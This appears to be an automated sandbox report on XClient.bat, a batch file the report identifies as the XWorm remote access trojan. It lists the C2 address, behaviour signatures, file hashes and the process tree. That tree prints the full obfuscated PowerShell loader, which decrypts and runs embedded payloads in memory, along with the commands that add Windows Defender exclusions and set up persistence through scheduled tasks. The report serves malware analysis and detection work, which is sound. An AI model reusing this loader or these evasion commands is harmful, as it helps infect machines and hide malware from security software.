Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 12:54

General

  • Target

    XClient.bat

  • Size

    306KB

  • MD5

    5f114fbb47589f072b2329adeab0e2d7

  • SHA1

    1572da87baa2fcd945be9ca5073cf2c27a5e4eda

  • SHA256

    976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1

  • SHA512

    4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69

  • SSDEEP

    6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3280
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_719_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_719.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2144
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_719.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_719.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_719.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_719.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3600
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4876
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2740
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1704
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2240
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1056
  • C:\Users\Admin\Runtime Broker.exe
    "C:\Users\Admin\Runtime Broker.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:1500

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    773440cd6eb4e778c7d2115d1f231f75

    SHA1

    4b600aa41fcd267817961c95b104a0717c40e558

    SHA256

    64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

    SHA512

    af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    77d622bb1a5b250869a3238b9bc1402b

    SHA1

    d47f4003c2554b9dfc4c16f22460b331886b191b

    SHA256

    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

    SHA512

    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    34f595487e6bfd1d11c7de88ee50356a

    SHA1

    4caad088c15766cc0fa1f42009260e9a02f953bb

    SHA256

    0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

    SHA512

    10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    da5c82b0e070047f7377042d08093ff4

    SHA1

    89d05987cd60828cca516c5c40c18935c35e8bd3

    SHA256

    77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

    SHA512

    7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpig2gcz.jaw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_719.bat

    Filesize

    306KB

    MD5

    5f114fbb47589f072b2329adeab0e2d7

    SHA1

    1572da87baa2fcd945be9ca5073cf2c27a5e4eda

    SHA256

    976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1

    SHA512

    4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69

  • C:\Users\Admin\AppData\Roaming\startup_str_719.vbs

    Filesize

    115B

    MD5

    8b0a2da6bcaae65ccc5ffeef7b50a4f2

    SHA1

    4682adff8caac8e83fd3273f498bd2bc5748560d

    SHA256

    86887705b83ea4206446cb198af1b9dbf8e2c3fbd5402232b648d95f32b9bfbd

    SHA512

    e0c80d6c94c9809f3c2db416b63aed7e5f292c3166441a242a183dbb165323a68b72437de268f56f3747ddfa2b73472e39441197196632920b287f8a6006c06e

  • C:\Users\Admin\Runtime Broker.exe

    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • memory/1500-108-0x000002AA9E100000-0x000002AA9E144000-memory.dmp

    Filesize

    272KB

  • memory/1500-109-0x000002AA9E3D0000-0x000002AA9E446000-memory.dmp

    Filesize

    472KB

  • memory/2144-30-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2144-18-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2144-17-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/2144-16-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3280-13-0x0000021A0FE90000-0x0000021A0FE98000-memory.dmp

    Filesize

    32KB

  • memory/3280-50-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3280-14-0x0000021A2A4A0000-0x0000021A2A4DC000-memory.dmp

    Filesize

    240KB

  • memory/3280-0-0x00007FFCF9733000-0x00007FFCF9735000-memory.dmp

    Filesize

    8KB

  • memory/3280-12-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3280-11-0x00007FFCF9730000-0x00007FFCFA1F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3280-10-0x0000021A0FF70000-0x0000021A0FF92000-memory.dmp

    Filesize

    136KB

  • memory/3600-49-0x0000025B485C0000-0x0000025B485DC000-memory.dmp

    Filesize

    112KB